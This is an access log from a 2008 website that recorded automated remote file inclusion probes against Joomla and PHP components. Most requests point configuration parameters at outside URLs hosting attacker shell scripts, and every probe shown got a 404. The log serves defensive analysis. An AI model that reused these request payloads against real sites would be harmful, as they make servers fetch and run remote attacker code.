87.238.199.109 - - [02/Mar/2008:19:47:51 -0800] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/durhaka/cmdasca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.238.199.109 - - [02/Mar/2008:19:47:51 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/durhaka/cmdasca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.238.199.109 - - [02/Mar/2008:19:47:51 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/durhaka/cmdasca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
74.52.2.130 - - [02/Mar/2008:19:49:12 -0800] "GET /logs/access_071224.log/index.php?option=com_simpleboard&Itemid=&func=&catid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.67.83.25 - - [02/Mar/2008:19:50:37 -0800] "GET /logs/access_071224.log/index.php?option=com_simpleboard&Itemid=&func=&catid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
83.166.170.10 - - [02/Mar/2008:19:50:45 -0800] "GET //newspublish/samplenewspublish.php?path[docroot]=http://www.sharingshores.com/CMS/media/test1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
83.166.170.10 - - [02/Mar/2008:19:50:50 -0800] "GET /logs//newspublish/samplenewspublish.php?path[docroot]=http://www.sharingshores.com/CMS/media/test1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
193.188.66.23 - - [02/Mar/2008:19:52:50 -0800] "GET /logs/access_071112.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
193.188.66.23 - - [02/Mar/2008:19:52:51 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.169.46.98 - - [02/Mar/2008:19:52:51 -0800] "GET /logs/access_071112.log/components/com_joomlalib/standalone/stubjambo.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "toulouseangloexchange.com"
193.188.66.23 - - [02/Mar/2008:19:52:51 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.169.46.98 - - [02/Mar/2008:19:52:51 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "toulouseangloexchange.com"
217.169.46.98 - - [02/Mar/2008:19:52:52 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "toulouseangloexchange.com"
217.13.86.10 - - [02/Mar/2008:19:53:54 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.13.86.10 - - [02/Mar/2008:19:53:54 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.13.86.10 - - [02/Mar/2008:19:53:54 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.13.86.10 - - [02/Mar/2008:19:55:42 -0800] "GET /logs/access_080211.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.91.30.3 - - [02/Mar/2008:19:55:59 -0800] "GET /logs/access.log/index.php?option=com_simpleboard&Itemid=&func=&catid=&mosConfig_absolute_path=http: